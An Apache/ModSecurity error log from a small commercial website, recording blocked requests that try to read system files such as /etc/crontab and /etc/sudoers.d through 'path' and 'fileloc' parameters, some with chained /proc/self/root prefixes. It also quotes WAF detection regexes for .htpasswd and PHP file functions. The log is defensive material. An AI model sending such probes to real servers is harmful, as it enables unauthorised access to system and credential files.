https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:40:19.369615 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:53858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1cU-oXxyEfFpUF8f-vCgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:40:21.929637 2026] [:error] [pid 11642:tid 140411632822016] [client 57.141.18.121:33556] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1cVbninkcc-iUj5AqMJgAAA40"]
[Fri Mar 20 11:40:52.892334 2026] [mime_magic:error] [pid 11642:tid 140411691570944] (70014)End of file found: [client 57.141.18.35:34604] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:40:54.030841 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.244.43:59664] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1cdta6ubjKNq_cu4YLrAAAA0k"]
[Fri Mar 20 11:41:04.086430 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.79:34914] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1cgPXLqtnMIWvjpaLK9QAAAoE"]
[Fri Mar 20 11:41:23.743918 2026] [mime_magic:error] [pid 31215:tid 140411658000128] (70014)End of file found: [client 74.7.243.128:50134] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/lib/yum/yumdb
[Fri Mar 20 11:41:52.459557 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.122:36372] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1csNa6ubjKNq_cu4YL2wAAA0I"]
[Fri Mar 20 11:41:52.775197 2026] [:error] [pid 26799:tid 140411607643904] [client 57.141.18.12:36350] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1csNa6ubjKNq_cu4YL3AAAA1A"]
[Fri Mar 20 11:42:08.118210 2026] [mime_magic:error] [pid 10189:tid 140411733534464] (70014)End of file found: [client 57.141.18.107:36838] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:42:16.242457 2026] [:error] [pid 7235:tid 140411733534464] [client 57.141.18.21:37058] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1cyPqxLDW4GITHUkQaBwAAAQE"]
[Fri Mar 20 11:42:18.665510 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:46232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1cyhCii7xarUs8iHaapAAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:42:23.061458 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.36:37208] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1cz11pVZ5mVmJwsFNecAAAAEs"]
[Fri Mar 20 11:42:36.919664 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:55738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1c3BCii7xarUs8iHaaswAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:42:49.083107 2026] [:error] [pid 15826:tid 140411582465792] [client 57.141.18.104:37980] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1c6eoXxyEfFpUF8f-vkAAAAVM"]
[Fri Mar 20 11:42:49.463060 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.10:37882] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1c6da6ubjKNq_cu4YMAAAAA0M"]
[Fri Mar 20 11:42:52.641578 2026] [:error] [pid 10189:tid 140411725141760] [client 57.141.18.16:38052] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1c7DJ3M9BSuKP7CAZX7wAAAII"]
[Fri Mar 20 11:43:10.187454 2026] [:error] [pid 31215:tid 140411599251200] [client 57.141.18.1:38536] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1c_gF0L0L-SsrnPo6ZAAAAAtE"]
[Fri Mar 20 11:43:10.877258 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.105:38556] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1c_jJ3M9BSuKP7CAZYBwAAAJc"]
[Fri Mar 20 11:43:19.281351 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.49:38738] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1dBta6ubjKNq_cu4YMKAAAA0M"]
[Fri Mar 20 11:43:33.691068 2026] [mime_magic:error] [pid 7235:tid 140411725141760] (70014)End of file found: [client 57.141.18.99:39198] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:43:51.555410 2026] [:error] [pid 11167:tid 140411607643904] [client 57.141.18.121:39800] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1dJ_HIg5MgXLBnicMlIwAAAdA"]
[Fri Mar 20 11:43:51.948420 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.93:39816] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1dJ-oXxyEfFpUF8f-vxgAAAVU"]
[Fri Mar 20 11:43:52.290294 2026] [:error] [pid 9818:tid 140411574073088] [client 57.141.18.62:39792] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1dKF1pVZ5mVmJwsFNekQAAAFQ"]
[Fri Mar 20 11:44:12.827578 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.97:40256] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1dPDJ3M9BSuKP7CAZYYAAAAJg"]
[Fri Mar 20 11:44:21.225458 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:39820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1dRda6ubjKNq_cu4YMmAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:44:32.159575 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.228.61:42924] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1dUOoXxyEfFpUF8f-v8gAAAUE"]
[Fri Mar 20 11:44:43.893384 2026] [:error] [pid 10189:tid 140411683178240] [client 57.141.18.6:41500] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1dWzJ3M9BSuKP7CAZYlAAAAIc"]
[Fri Mar 20 11:45:03.628895 2026] [:error] [pid 7893:tid 140411607643904] [client 57.141.18.59:42230] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1dbxCii7xarUs8iHaa7wAAAhA"]
[Fri Mar 20 11:45:17.493027 2026] [:error] [pid 21219:tid 140411548894976] [client 57.141.18.109:42756] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1dffXLqtnMIWvjpaLL1gAAApc"]
[Fri Mar 20 11:45:19.365638 2026] [:error] [pid 7893:tid 140411666392832] [client 216.73.216.191:27785] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf)|gz(?:(?:encod|writ)e|compress|open|read)|scandir|read(?:(?:gz)?file|dir)|(?:proc_|bz)open|call_user_func))\\\\b" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_phpinjection.conf"] [line "9"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: readdir found within ARGS:fileloc: //opt/lc/php/5.5/include/php/TSRM/readdir.h"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1dfhCii7xarUs8iHaa-AAAAgk"]
[Fri Mar 20 11:45:25.883917 2026] [mime_magic:error] [pid 15826:tid 140411674785536] (70014)End of file found: [client 57.141.18.124:43110] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
